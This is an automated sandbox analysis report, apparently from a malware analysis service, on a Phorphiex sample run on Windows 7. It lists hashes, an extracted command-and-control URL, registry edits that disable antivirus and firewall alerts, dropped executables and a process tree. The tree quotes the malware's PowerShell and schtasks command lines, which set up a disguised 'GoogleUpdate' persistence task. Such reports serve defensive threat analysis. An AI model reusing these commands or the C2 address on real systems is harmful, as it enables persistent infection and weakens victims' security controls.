Analysis
max time kernel: 150s
max time network: 152s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 28-09-2022 09:38
Behavioral task: behavioral1
Sample: tmp.exe
Resource: win7-20220901-en
General
Target: tmp.exe
Size: 75KB
MD5: ed2d7b25bb360cccb4f0f6a4f8732d7a
SHA1: 6ffcc083956c5ac19826bdd87e12f87817ee837c
SHA256: 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
SHA512: 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f
SSDEEP: 1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
Malware Config
Extracted
phorphiex
http://185.215.113.66/twizt/
Signatures
Processes: sysrdsvms.exe, winrecsv.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | winrecsv.exe
Downloads MZ/PE file
Executes dropped EXE 10 IoCs
Processes: winrecsv.exe, 1546029693.exe, 267013931.exe, 2720910907.exe, sysrdsvms.exe, 1176812100.exe, 394619085.exe, 734023711.exe, updater.exe, updater.exe
pid | process
- 1220 | winrecsv.exe
- 1344 | 1546029693.exe
- 2024 | 267013931.exe
- 1228 | 2720910907.exe
- 944 | sysrdsvms.exe
- 2032 | 1176812100.exe
- 1532 | 394619085.exe
- 1940 | 734023711.exe
- 1516 | updater.exe
- 2024 | updater.exe
Loads dropped DLL 8 IoCs
Processes: winrecsv.exe, 267013931.exe, sysrdsvms.exe, taskeng.exe
pid | process
- 1220 | winrecsv.exe
- 1220 | winrecsv.exe
- 1220 | winrecsv.exe
- 1220 | winrecsv.exe
- 2024 | 267013931.exe
- 944 | sysrdsvms.exe
- 944 | sysrdsvms.exe
- 1672 | taskeng.exe
Processes: winrecsv.exe, sysrdsvms.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysrdsvms.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | winrecsv.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysrdsvms.exe
Adds Run key to start application 2 TTPs 2 IoCs
Processes: tmp.exe, 2720910907.exe
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | tmp.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysrdsvms.exe" | 2720910907.exe
Drops file in System32 directory 1 IoCs
Processes: powershell.exe
description | ioc | process
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Drops file in Windows directory 4 IoCs
Processes: tmp.exe, 2720910907.exe
description | ioc | process
- File created | C:\Windows\winrecsv.exe | tmp.exe
- File opened for modification | C:\Windows\winrecsv.exe | tmp.exe
- File created | C:\Windows\sysrdsvms.exe | 2720910907.exe
- File opened for modification | C:\Windows\sysrdsvms.exe | 2720910907.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe, schtasks.exe
pid | process
- 640 | schtasks.exe
- 268 | schtasks.exe
- 1148 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes: 1546029693.exe, 394619085.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe
pid | process
- 1344 | 1546029693.exe
- 1532 | 394619085.exe
- 1072 | powershell.exe
- 1228 | powershell.exe
- 1472 | powershell.exe
- 1620 | powershell.exe
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes: 1546029693.exe, 394619085.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, WMIC.exe
description | pid | process
- Token: SeDebugPrivilege | 1344 | 1546029693.exe
- Token: SeDebugPrivilege | 1532 | 394619085.exe
- Token: SeDebugPrivilege | 1072 | powershell.exe
- Token: SeDebugPrivilege | 1228 | powershell.exe
- Token: SeDebugPrivilege | 1472 | powershell.exe
- Token: SeDebugPrivilege | 1620 | powershell.exe
- Token: <privilege> | 616 | WMIC.exe, recorded twice for each of the following 20 privileges in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
Suspicious use of WriteProcessMemory 64 IoCs
Processes: tmp.exe, winrecsv.exe, 1546029693.exe, cmd.exe, cmd.exe, 2720910907.exe, 267013931.exe, sysrdsvms.exe, 394619085.exe, cmd.exe, cmd.exe, 1176812100.exe, powershell.exe
description | pid | process | target process (the count in parentheses is how many times the identical row was recorded)
- PID 1760 wrote to memory of 1220 | 1760 | tmp.exe | winrecsv.exe (4)
- PID 1220 wrote to memory of 1344 | 1220 | winrecsv.exe | 1546029693.exe (4)
- PID 1344 wrote to memory of 1912 | 1344 | 1546029693.exe | cmd.exe (3)
- PID 1344 wrote to memory of 1052 | 1344 | 1546029693.exe | cmd.exe (3)
- PID 1912 wrote to memory of 1532 | 1912 | cmd.exe | reg.exe (3)
- PID 1052 wrote to memory of 968 | 1052 | cmd.exe | schtasks.exe (3)
- PID 1220 wrote to memory of 2024 | 1220 | winrecsv.exe | 267013931.exe (4)
- PID 1220 wrote to memory of 1228 | 1220 | winrecsv.exe | 2720910907.exe (4)
- PID 1228 wrote to memory of 944 | 1228 | 2720910907.exe | sysrdsvms.exe (4)
- PID 2024 wrote to memory of 2032 | 2024 | 267013931.exe | 1176812100.exe (4)
- PID 944 wrote to memory of 1532 | 944 | sysrdsvms.exe | 394619085.exe (4)
- PID 1532 wrote to memory of 828 | 1532 | 394619085.exe | cmd.exe (3)
- PID 1532 wrote to memory of 1360 | 1532 | 394619085.exe | cmd.exe (3)
- PID 828 wrote to memory of 616 | 828 | cmd.exe | reg.exe (3)
- PID 1360 wrote to memory of 1108 | 1360 | cmd.exe | schtasks.exe (3)
- PID 2032 wrote to memory of 1072 | 2032 | 1176812100.exe | powershell.exe (3)
- PID 1072 wrote to memory of 640 | 1072 | powershell.exe | schtasks.exe (3)
- PID 2032 wrote to memory of 1228 | 2032 | 1176812100.exe | powershell.exe (3)
- PID 944 wrote to memory of 1940 | 944 | sysrdsvms.exe | 734023711.exe (3)
Processes
Process tree (the number in brackets is the nesting depth; each entry lists image path, command line, triggered signatures and PID)

[1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID: 1760
  [2] C:\Windows\winrecsv.exe
      cmdline: C:\Windows\winrecsv.exe
      - Windows security bypass
      - Executes dropped EXE
      - Loads dropped DLL
      - Windows security modification
      - Suspicious use of WriteProcessMemory
      PID: 1220
    [3] C:\Users\Admin\AppData\Local\Temp\1546029693.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\1546029693.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1344
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
          - Suspicious use of WriteProcessMemory
          PID: 1912
        [5] C:\Windows\system32\reg.exe
            cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
            PID: 1532
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
          - Suspicious use of WriteProcessMemory
          PID: 1052
        [5] C:\Windows\system32\schtasks.exe
            cmdline: schtasks /delete /f /tn "User Configuration"
            PID: 968
    [3] C:\Users\Admin\AppData\Local\Temp\267013931.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\267013931.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 2024
      [4] C:\Users\Admin\AppData\Local\Temp\1176812100.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\1176812100.exe
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
          PID: 2032
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 1072
          [6] C:\Windows\system32\schtasks.exe
              cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
              - Creates scheduled task(s)
              PID: 640
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1228
          [6] C:\Windows\system32\schtasks.exe
              cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
              PID: 1648
    [3] C:\Users\Admin\AppData\Local\Temp\2720910907.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\2720910907.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - Suspicious use of WriteProcessMemory
        PID: 1228
      [4] C:\Windows\sysrdsvms.exe
          cmdline: C:\Windows\sysrdsvms.exe
          - Windows security bypass
          - Executes dropped EXE
          - Loads dropped DLL
          - Windows security modification
          - Suspicious use of WriteProcessMemory
          PID: 944
        [5] C:\Users\Admin\AppData\Local\Temp\394619085.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\394619085.exe
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 1532
          [6] C:\Windows\System32\cmd.exe
              cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
              - Suspicious use of WriteProcessMemory
              PID: 828
            [7] C:\Windows\system32\reg.exe
                cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
                PID: 616
          [6] C:\Windows\System32\cmd.exe
              cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
              - Suspicious use of WriteProcessMemory
              PID: 1360
            [7] C:\Windows\system32\schtasks.exe
                cmdline: schtasks /delete /f /tn "User Configuration"
                PID: 1108
        [5] C:\Users\Admin\AppData\Local\Temp\734023711.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\734023711.exe
            - Executes dropped EXE
            PID: 1940
          [6] C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
              cmdline: C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
              - Executes dropped EXE
              PID: 2024
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 1620
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
                  - Creates scheduled task(s)
                  PID: 1148
            [7] C:\Windows\system32\cmd.exe
                cmdline: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
                PID: 1388
              [8] C:\Windows\System32\Wbem\WMIC.exe
                  cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 616

[1] C:\Windows\system32\taskeng.exe
    cmdline: taskeng.exe {4FCE7D72-71EF-4E8D-933B-3745F908F74E} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
    - Loads dropped DLL
    PID: 1672
  [2] C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      cmdline: C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      - Executes dropped EXE
      PID: 1516
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1472
      [4] C:\Windows\system32\schtasks.exe
          cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
          - Creates scheduled task(s)
          PID: 268
    [3] C:\Windows\system32\cmd.exe
        cmdline: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
        PID: 1500
Network
MITRE ATT&CK Enterprise v6
Downloads